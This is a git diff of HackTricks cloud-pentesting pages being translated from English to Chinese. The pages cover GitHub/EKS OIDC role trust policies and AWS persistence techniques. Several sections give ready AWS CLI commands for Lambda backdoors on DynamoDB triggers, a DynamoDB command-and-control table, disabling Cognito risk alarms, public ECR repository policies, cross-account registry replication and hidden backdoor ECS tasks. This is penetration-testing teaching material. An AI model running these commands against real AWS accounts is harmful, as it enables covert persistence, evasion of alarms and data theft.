"arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "token.actions.githubusercontent.com:sub": [ - "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request", - "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main" - ], - "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" - } - } - } - ] - } - ``` -6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**. -7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**. -8. Finally use a github action to configure the AWS creds to be used by the workflow: +为了将 github action 添加为身份提供者: +1. 对于 _提供者类型_,选择 **OpenID Connect**。 +2. 对于 _提供者 URL_,输入 `https://token.actions.githubusercontent.com` +3. 点击 _获取指纹_ 以获取提供者的指纹 +4. 对于 _受众_,输入 `sts.amazonaws.com` +5. 
创建一个具有 github action 所需的 **权限** 和信任提供者的 **信任策略** 的 **新角色**,例如: +- ```json +{ +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"token.actions.githubusercontent.com:sub": [ +"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request", +"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main" +], +"token.actions.githubusercontent.com:aud": "sts.amazonaws.com" +} +} +} +] +} +``` +6. 请注意在前面的策略中,只有来自 **组织** 的 **存储库** 的一个 **分支** 被授权具有特定的 **触发器**。 +7. github action 将能够 **冒充** 的 **角色** 的 **ARN** 将是 github action 需要知道的“秘密”,因此 **将其存储** 在 **环境** 中的 **秘密** 内。 +8. 最后,使用 github action 配置工作流将使用的 AWS 凭据: ```yaml name: "test AWS Access" # The workflow should only trigger on pull requests to the main branch on: - pull_request: - branches: - - main +pull_request: +branches: +- main # Required to get the ID Token that will be used for OIDC permissions: - id-token: write - contents: read # needed for private repos to checkout +id-token: write +contents: read # needed for private repos to checkout jobs: - aws: - runs-on: ubuntu-latest - steps: - - name: Checkout - uses: actions/checkout@v3 +aws: +runs-on: ubuntu-latest +steps: +- name: Checkout +uses: actions/checkout@v3 - - name: Configure AWS Credentials - uses: aws-actions/configure-aws-credentials@v1 - with: - aws-region: eu-west-1 - role-to-assume:${{ secrets.READ_ROLE }} - role-session-name: OIDCSession +- name: Configure AWS Credentials +uses: aws-actions/configure-aws-credentials@v1 +with: +aws-region: eu-west-1 +role-to-assume:${{ secrets.READ_ROLE }} +role-session-name: OIDCSession - - run: aws sts get-caller-identity - shell: bash +- run: aws sts get-caller-identity +shell: bash ``` - -## OIDC - EKS Abuse - +## OIDC - EKS 滥用 ```bash # Crate an EKS cluster (~10min) eksctl create cluster --name demo --fargate @@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate # Create an Identity Provider for an EKS cluster eksctl utils associate-iam-oidc-provider --cluster Testing --approve ``` - -It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy: - +可以通过将集群的 **OIDC URL** 设置为 **新的 Open ID 身份提供者** 在 **EKS** 集群中生成 **OIDC 提供者**。这是一个常见的默认策略: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" +} +} +} +] } ``` +该策略正确地指示**只有**具有**id** `20C159CDF6F2349B68846BEC03BE031B`的**EKS集群**可以承担该角色。然而,它并没有指明哪个服务账户可以承担它,这意味着**任何具有Web身份令牌的服务账户**都将**能够承担**该角色。 -This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. 
However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role. - -In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as: - +为了指定**哪个服务账户应该能够承担该角色,**需要指定一个**条件**,其中**指定服务账户名称**,例如: ```bash "oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account", ``` - ## References - [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md index 28868b9f1..cde637d91 100644 --- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md +++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md @@ -2,20 +2,16 @@ {{#include ../../banners/hacktricks-training.md}} -These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: +这些是您在每个要审计的 AWS 账户上需要的权限,以便能够运行所有提议的 AWS 审计工具: -- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) -- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions: - - **access-analyzer:List\*** - - **access-analyzer:Get\*** - - **iam:CreateServiceLinkedRole** - - **access-analyzer:CreateAnalyzer** - - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission) - - **access-analyzer:DeleteAnalyzer** - - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission) +- 默认策略 **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) +- 要运行 [aws_iam_review](https://github.com/carlospolop/aws_iam_review),您还需要以下权限: +- **access-analyzer:List\*** +- **access-analyzer:Get\*** +- **iam:CreateServiceLinkedRole** +- **access-analyzer:CreateAnalyzer** +- 如果客户为您生成分析器,则可选,但通常直接请求此权限更容易) +- **access-analyzer:DeleteAnalyzer** +- 如果客户为您删除分析器,则可选,但通常直接请求此权限更容易) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md index f3b45c4d3..151e88fb6 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/README.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md @@ -1,6 +1 @@ -# AWS - Persistence - - - - - +# AWS - 持久性 diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md index 6d2b0ec35..93f423119 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md @@ -4,7 +4,7 @@ ## API Gateway -For more information go to: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-api-gateway-enum.md @@ -12,25 +12,21 @@ For more information go to: ### Resource Policy -Modify the resource 
policy of the API gateway(s) to grant yourself access to them +修改 API 网关的资源策略以授予自己访问权限 ### Modify Lambda Authorizers -Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ -Or just remove the use of the authorizer. +修改 lambda 授权者的代码以授予自己对所有端点的访问权限。\ +或者只需删除授权者的使用。 ### IAM Permissions -If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ -Or just remove the use of the authorizer. +如果资源使用 IAM 授权者,您可以通过修改 IAM 权限来授予自己访问权限。\ +或者只需删除授权者的使用。 ### API Keys -If API keys are used, you could leak them to maintain persistence or even create new ones.\ -Or just remove the use of API keys. +如果使用了 API 密钥,您可以泄露它们以保持持久性,甚至创建新的密钥。\ +或者只需删除 API 密钥的使用。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md index e2e037e53..f6fc5df40 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md @@ -4,24 +4,24 @@ ## Cognito -For more information, access: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-cognito-enum/ {{#endref}} -### User persistence +### 用户持久性 -Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: +Cognito 是一个允许为未认证和已认证用户分配角色并控制用户目录的服务。可以更改几种不同的配置以保持某种持久性,例如: -- **Adding a User Pool** controlled by the user to an Identity Pool -- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** - - Or to an **authenticated Identity Pool** if the attacker can login - - Or **improve the permissions** of the given roles -- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** -- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool +- **将用户池**添加到由用户控制的身份池 +- 为**未认证身份池**提供**IAM角色并允许基本身份验证流程** +- 或者为**已认证身份池**提供角色,如果攻击者可以登录 +- 或者**提高给定角色的权限** +- **通过受控属性的用户或新用户在**用户池中**创建、验证和权限提升** +- **允许外部身份提供者**在用户池或身份池中登录 -Check how to do these actions in +查看如何执行这些操作 {{#ref}} ../aws-privilege-escalation/aws-cognito-privesc.md @@ -29,18 +29,12 @@ Check how to do these actions in ### `cognito-idp:SetRiskConfiguration` -An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: - +具有此权限的攻击者可以修改风险配置,以便能够作为 Cognito 用户登录**而不会触发警报**。[**查看 cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html)以查看所有选项: ```bash aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} ``` - -By default this is disabled: +默认情况下,这是禁用的:
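To check the current state (a sketch; the user pool id is a placeholder), the risk configuration applied to a user pool can be queried with:
```bash
# Dump the risk configuration currently applied to the user pool (empty/default if none was ever set)
aws cognito-idp describe-risk-configuration --user-pool-id <user-pool-id>
```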
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md index 75a824e73..15d7ea70c 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md @@ -1,67 +1,59 @@ -# AWS - DynamoDB Persistence +# AWS - DynamoDB 持久性 {{#include ../../../banners/hacktricks-training.md}} ### DynamoDB -For more information access: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-dynamodb-enum.md {{#endref}} -### DynamoDB Triggers with Lambda Backdoor - -Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. +### 使用 Lambda 后门的 DynamoDB 触发器 +通过使用 DynamoDB 触发器,攻击者可以通过将恶意 Lambda 函数与表关联来创建一个 **隐蔽的后门**。当添加、修改或删除项目时,可以触发 Lambda 函数,从而允许攻击者在 AWS 账户内执行任意代码。 ```bash # Create a malicious Lambda function aws lambda create-function \ - --function-name MaliciousFunction \ - --runtime nodejs14.x \ - --role \ - --handler index.handler \ - --zip-file fileb://malicious_function.zip \ - --region +--function-name MaliciousFunction \ +--runtime nodejs14.x \ +--role \ +--handler index.handler \ +--zip-file fileb://malicious_function.zip \ +--region # Associate the Lambda function with the DynamoDB table as a trigger aws dynamodbstreams describe-stream \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region # Note the "StreamArn" from the output aws lambda create-event-source-mapping \ - --function-name MaliciousFunction \ - --event-source \ - --region +--function-name MaliciousFunction \ +--event-source \ +--region ``` +为了保持持久性,攻击者可以在DynamoDB表中创建或修改项目,这将触发恶意的Lambda函数。这允许攻击者在AWS账户内执行代码,而无需直接与Lambda函数交互。 -To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. - -### DynamoDB as a C2 Channel - -An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. 
+### DynamoDB作为C2通道 +攻击者可以通过创建包含命令的项目并使用被攻陷的实例或Lambda函数来获取和执行这些命令,从而将DynamoDB表用作**命令和控制(C2)通道**。 ```bash # Create a DynamoDB table for C2 aws dynamodb create-table \ - --table-name C2Table \ - --attribute-definitions AttributeName=CommandId,AttributeType=S \ - --key-schema AttributeName=CommandId,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --region +--table-name C2Table \ +--attribute-definitions AttributeName=CommandId,AttributeType=S \ +--key-schema AttributeName=CommandId,KeyType=HASH \ +--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ +--region # Insert a command into the table aws dynamodb put-item \ - --table-name C2Table \ - --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ - --region +--table-name C2Table \ +--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ +--region ``` - -The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. +被攻陷的实例或 Lambda 函数可以定期检查 C2 表以获取新命令,执行它们,并可选择将结果报告回表中。这使攻击者能够保持对被攻陷资源的持久性和控制。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md index b52ac9e85..4e8eaf642 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md @@ -1,58 +1,54 @@ -# AWS - EC2 Persistence +# AWS - EC2 持久性 {{#include ../../../banners/hacktricks-training.md}} ## EC2 -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -### Security Group Connection Tracking Persistence +### 安全组连接跟踪持久性 -If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. +如果防御者发现**EC2 实例被攻陷**,他可能会尝试**隔离**该机器的**网络**。他可以通过显式的**拒绝 NACL**(但 NACL 会影响整个子网)或**更改安全组**来不允许**任何类型的入站或出站**流量。 -If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** +如果攻击者从该机器获得了**反向 shell**,即使安全组被修改为不允许入站或出站流量,**连接也不会被终止,因为** [**安全组连接跟踪**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**。** -### EC2 Lifecycle Manager +### EC2 生命周期管理器 -This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ -An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. +该服务允许**调度**创建**AMI 和快照**,甚至**与其他账户共享**。\ +攻击者可以配置**每周生成所有镜像或所有卷的 AMI 或快照**并**与他的账户共享**。 -### Scheduled Instances +### 定时实例 -It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. 
+可以调度实例每天、每周甚至每月运行。攻击者可以运行一台具有高权限或有趣访问权限的机器。 -### Spot Fleet Request +### Spot Fleet 请求 -Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. +Spot 实例比常规实例**便宜**。攻击者可以发起一个**为期 5 年的小型 Spot Fleet 请求**(例如),并**自动分配 IP**,以及一个**用户数据**,在**Spot 实例启动时**发送给攻击者**IP 地址**和**高权限 IAM 角色**。 -### Backdoor Instances +### 后门实例 -An attacker could get access to the instances and backdoor them: +攻击者可以访问实例并对其进行后门处理: -- Using a traditional **rootkit** for example -- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) -- Backdooring the **User Data** +- 例如使用传统的**rootkit** +- 添加一个新的**公共 SSH 密钥**(查看 [EC2 权限提升选项](../aws-privilege-escalation/aws-ec2-privesc.md)) +- 对**用户数据**进行后门处理 -### **Backdoor Launch Configuration** +### **后门启动配置** -- Backdoor the used AMI -- Backdoor the User Data -- Backdoor the Key Pair +- 对使用的 AMI 进行后门处理 +- 对用户数据进行后门处理 +- 对密钥对进行后门处理 ### VPN -Create a VPN so the attacker will be able to connect directly through i to the VPC. +创建一个 VPN,以便攻击者能够直接通过它连接到 VPC。 -### VPC Peering +### VPC 对等连接 -Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. +在受害者 VPC 和攻击者 VPC 之间创建对等连接,以便他能够访问受害者 VPC。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md index 07928fbd4..95a579b72 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md @@ -4,98 +4,88 @@ ## ECR -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Hidden Docker Image with Malicious Code +### 带有恶意代码的隐藏Docker镜像 -An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. 
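A minimal sketch of how such an image could be pushed (the account id, region and repository name below are placeholders, not values from this page):
```bash
# Authenticate Docker against the target registry
aws ecr get-login-password --region us-east-1 | \
  docker login --username AWS --password-stdin 123456789012.dkr.ecr.us-east-1.amazonaws.com

# Tag a backdoored image over an existing tag and push it
docker tag malicious-image:latest 123456789012.dkr.ecr.us-east-1.amazonaws.com/legit-repo:latest
docker push 123456789012.dkr.ecr.us-east-1.amazonaws.com/legit-repo:latest
```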
+攻击者可以**将包含恶意代码的Docker镜像**上传到ECR存储库,并利用它在目标AWS账户中保持持久性。然后,攻击者可以以隐蔽的方式将恶意镜像部署到账户内的各种服务,例如Amazon ECS或EKS。 -### Repository Policy - -Add a policy to a single repository granting yourself (or everybody) access to a repository: +### 存储库策略 +向单个存储库添加策略,授予您自己(或所有人)对存储库的访问权限: ```bash aws ecr set-repository-policy \ - --repository-name cluster-autoscaler \ - --policy-text file:///tmp/my-policy.json +--repository-name cluster-autoscaler \ +--policy-text file:///tmp/my-policy.json # With a .json such as { - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] +"Version" : "2008-10-17", +"Statement" : [ +{ +"Sid" : "allow public pull", +"Effect" : "Allow", +"Principal" : "*", +"Action" : [ +"ecr:BatchCheckLayerAvailability", +"ecr:BatchGetImage", +"ecr:GetDownloadUrlForLayer" +] +} +] } ``` - > [!WARNING] -> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. +> 请注意,ECR要求用户通过IAM策略具有**权限**,以便在**认证**到注册表并从任何Amazon ECR存储库推送或拉取任何镜像之前,可以调用**`ecr:GetAuthorizationToken`** API。 -### Registry Policy & Cross-account Replication +### 注册表策略与跨账户复制 -It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. +可以通过配置跨账户复制自动复制外部账户中的注册表,在那里您需要**指明外部账户**,您希望复制注册表。
-First, you need to give the external account access over the registry with a **registry policy** like: - +首先,您需要通过**注册表策略**授予外部账户对注册表的访问权限,例如: ```bash aws ecr put-registry-policy --policy-text file://my-policy.json # With a .json like: { - "Sid": "asdasd", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::947247140022:root" - }, - "Action": [ - "ecr:CreateRepository", - "ecr:ReplicateImage" - ], - "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" +"Sid": "asdasd", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::947247140022:root" +}, +"Action": [ +"ecr:CreateRepository", +"ecr:ReplicateImage" +], +"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" } ``` - -Then apply the replication config: - +然后应用复制配置: ```bash aws ecr put-replication-configuration \ - --replication-configuration file://replication-settings.json \ - --region us-west-2 +--replication-configuration file://replication-settings.json \ +--region us-west-2 # Having the .json a content such as: { - "rules": [{ - "destinations": [{ - "region": "destination_region", - "registryId": "destination_accountId" - }], - "repositoryFilters": [{ - "filter": "repository_prefix_name", - "filterType": "PREFIX_MATCH" - }] - }] +"rules": [{ +"destinations": [{ +"region": "destination_region", +"registryId": "destination_accountId" +}], +"repositoryFilters": [{ +"filter": "repository_prefix_name", +"filterType": "PREFIX_MATCH" +}] +}] } ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md index 988626c8f..ab788d522 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md @@ -1,32 +1,31 @@ -# AWS - ECS Persistence +# AWS - ECS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## ECS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} -### Hidden Periodic ECS Task +### 隐藏的周期性 ECS 任务 > [!NOTE] -> TODO: Test - -An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account. 
+> TODO: 测试 +攻击者可以使用 Amazon EventBridge 创建一个隐藏的周期性 ECS 任务,以**定期调度恶意任务的执行**。该任务可以进行侦察、外泄数据或在 AWS 账户中维持持久性。 ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ - { - "name": "malicious-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - } +{ +"name": "malicious-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +} ]' # Create an Amazon EventBridge rule to trigger the task periodically @@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate # Add a target to the rule to run the malicious ECS task aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ - { - "Id": "malicious-ecs-task-target", - "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", - "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", - "EcsParameters": { - "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", - "TaskCount": 1 - } - } +{ +"Id": "malicious-ecs-task-target", +"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", +"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", +"EcsParameters": { +"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", +"TaskCount": 1 +} +} ]' ``` - -### Backdoor Container in Existing ECS Task Definition +### 在现有 ECS 任务定义中添加后门容器 > [!NOTE] -> TODO: Test - -An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities. +> TODO: 测试 +攻击者可以在现有的 ECS 任务定义中添加一个 **隐蔽的后门容器**,该容器与合法容器并行运行。后门容器可用于持久性和执行恶意活动。 ```bash # Update the existing task definition to include the backdoor container aws ecs register-task-definition --family "existing-task" --container-definitions '[ - { - "name": "legitimate-container", - "image": "legitimate-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - }, - { - "name": "backdoor-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": false - } +{ +"name": "legitimate-container", +"image": "legitimate-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +}, +{ +"name": "backdoor-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": false +} ]' ``` - ### Undocumented ECS Service > [!NOTE] > TODO: Test -An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service. 
- +攻击者可以创建一个**未记录的ECS服务**,该服务运行恶意任务。通过将所需的任务数量设置为最小并禁用日志记录,管理员更难注意到该恶意服务。 ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ - { - "name": "malicious-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - } +{ +"name": "malicious-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +} ]' # Create an undocumented ECS service with the malicious task definition aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md index bdb282d41..4270bb779 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md @@ -1,25 +1,21 @@ -# AWS - EFS Persistence +# AWS - EFS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## EFS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-efs-enum.md {{#endref}} -### Modify Resource Policy / Security Groups +### 修改资源策略 / 安全组 -Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. +通过修改 **资源策略和/或安全组**,您可以尝试将您的访问持久化到文件系统中。 -### Create Access Point +### 创建访问点 -You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. +您可以 **创建一个访问点**(具有对 `/` 的根访问权限),该访问点可以从您已实施 **其他持久性** 的服务访问,以保持对文件系统的特权访问。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md index c55e0e2ba..ac6bc142e 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md @@ -4,31 +4,30 @@ ## Elastic Beanstalk -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md {{#endref}} -### Persistence in Instance +### 实例中的持久性 -In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**. +为了在 AWS 账户中保持持久性,可以在实例内部引入一些 **持久性机制**(cron 作业,ssh 密钥...),以便攻击者能够访问并从元数据服务中窃取 IAM 角色 **凭证**。 -### Backdoor in Version +### 版本中的后门 -An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code. +攻击者可以在 S3 仓库中植入后门代码,以便它始终执行其后门和预期代码。 -### New backdoored version +### 新的植入后门版本 -Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application. +攻击者可以部署一个新的植入后门的应用程序版本,而不是更改实际版本中的代码。 -### Abusing Custom Resource Lifecycle Hooks +### 滥用自定义资源生命周期钩子 > [!NOTE] -> TODO: Test - -Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. 
